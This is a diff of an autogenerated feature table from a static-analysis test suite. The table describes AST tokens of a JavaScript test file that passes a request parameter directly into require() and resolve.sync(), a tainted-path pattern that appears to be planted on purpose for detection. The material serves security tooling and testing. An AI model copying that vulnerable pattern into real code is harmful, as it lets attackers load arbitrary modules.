autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:32:5:34 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:5:37:5:39 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:5:37:5:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:5:37:5:39 | res | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:5:37:5:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:5:37:5:39 | res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:7 | m | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:7 | m | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:7 | m | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:7 | m | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:7 | m | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:38 | m = req ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:38 | m = req ... dule")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:38 | m = req ... dule")) | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:38 | m = req ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:7:7:38 | m = req ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:17 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:17 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:17 | require | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:17 | require | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:17 | require | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | exceptional return of require ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | exceptional return of require ... dule")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | exceptional return of require ... dule")) | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | exceptional return of require ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | exceptional return of require ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | require ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | require ... dule")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | require ... dule")) | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | require ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:11:7:38 | require ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:21 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:21 | req | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:21 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:21 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:27 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:27 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:27 | req.param | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:27 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:27 | req.param | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | exceptional return of req.param("module") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | exceptional return of req.param("module") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | exceptional return of req.param("module") | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | exceptional return of req.param("module") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | exceptional return of req.param("module") | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | calleeImports | | @@ -10821,6 +85263,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | enclosingFunctionBody | req res m require req param module | | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:7:19:7:37 | req.param("module") | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:7:23:7:27 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:7:23:7:27 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:7:23:7:27 | param | enclosingFunctionBody | req res m require req param module | +| autogenerated/TaintedPath/tainted-require.js:7:23:7:27 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:7:23:7:27 | param | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | contextFunctionInterfaces | | @@ -10829,12 +85276,46 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:7:29:7:36 | "module" | receiverName | req | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:13 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:13 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:13 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:13 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve ... solve") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve ... solve") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:7:10:34 | resolve ... solve") | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:23 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:23 | require | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | exceptional return of require("resolve") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | exceptional return of require("resolve") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | exceptional return of require("resolve") | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | require("resolve") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | require("resolve") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:10:17:10:34 | require("resolve") | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | calleeImports | | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-require.js:10:25:10:33 | "resolve" | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:3 | app | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:7 | app.get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:1:11:7 | app.get | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | app.get ... });\\n}) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:1:17:2 | exceptional return of app.get ... });\\n}) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:5:11:7 | get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:5:11:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:5:11:7 | get | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | calleeImports | express | @@ -10842,6 +85323,31 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:11:9:11:20 | '/some/path' | receiverName | app | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | __dirname | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | __dirname | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | __dirname | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | __dirname | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | resolve | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | this | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:11:22 | this | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | 'arguments' object of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | exceptional return of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | exceptional return of anonymous function | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | calleeImports | express | @@ -10849,6 +85355,76 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | functio ... });\\n} | receiverName | app | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | return of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:23:17:1 | return of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:32:11:34 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:11:37:11:39 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:11:37:11:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:11:37:11:39 | res | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:11:37:11:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:11:37:11:39 | res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:12 | module | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:12 | module | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:12 | module | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:12 | module | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:12 | module | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:48 | module ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:48 | module ... dule")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:48 | module ... dule")) | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:48 | module ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:7:12:48 | module ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:22 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:22 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:22 | resolve | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:22 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:27 | resolve.sync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:27 | resolve.sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:27 | resolve.sync | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:27 | resolve.sync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:27 | resolve.sync | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | exceptional return of resolve ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | exceptional return of resolve ... dule")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | exceptional return of resolve ... dule")) | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | exceptional return of resolve ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | exceptional return of resolve ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | resolve ... dule")) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | resolve ... dule")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | resolve ... dule")) | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | resolve ... dule")) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:16:12:48 | resolve ... dule")) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:24:12:27 | sync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:24:12:27 | sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:24:12:27 | sync | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:24:12:27 | sync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:24:12:27 | sync | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:31 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:31 | req | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:31 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:31 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:37 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:37 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:37 | req.param | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:37 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:37 | req.param | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | exceptional return of req.param("module") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | exceptional return of req.param("module") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | exceptional return of req.param("module") | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | exceptional return of req.param("module") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | exceptional return of req.param("module") | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | CalleeFlexibleAccessPath | resolve.sync | | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | calleeImports | resolve | @@ -10858,6 +85434,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:12:29:12:47 | req.param("module") | receiverName | resolve | +| autogenerated/TaintedPath/tainted-require.js:12:33:12:37 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:12:33:12:37 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:12:33:12:37 | param | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:12:33:12:37 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:12:33:12:37 | param | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | contextFunctionInterfaces | | @@ -10866,6 +85447,36 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:12:39:12:46 | "module" | receiverName | req | +| autogenerated/TaintedPath/tainted-require.js:14:3:14:9 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:3:14:9 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:3:14:9 | resolve | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:3:14:9 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:3:14:9 | resolve | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | exceptional return of resolve ... s;\\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | exceptional return of resolve ... s;\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | exceptional return of resolve ... s;\\n }) | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | exceptional return of resolve ... s;\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | exceptional return of resolve ... s;\\n }) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | resolve ... s;\\n }) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | resolve ... s;\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | resolve ... s;\\n }) | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | resolve ... s;\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:3:16:4 | resolve ... s;\\n }) | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:13 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:13 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:13 | req | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:13 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:13 | req | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:19 | req.param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:19 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:19 | req.param | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:19 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:19 | req.param | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | exceptional return of req.param("module") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | exceptional return of req.param("module") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | exceptional return of req.param("module") | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | exceptional return of req.param("module") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | exceptional return of req.param("module") | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | CalleeFlexibleAccessPath | resolve | | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | calleeImports | resolve | @@ -10874,6 +85485,11 @@ 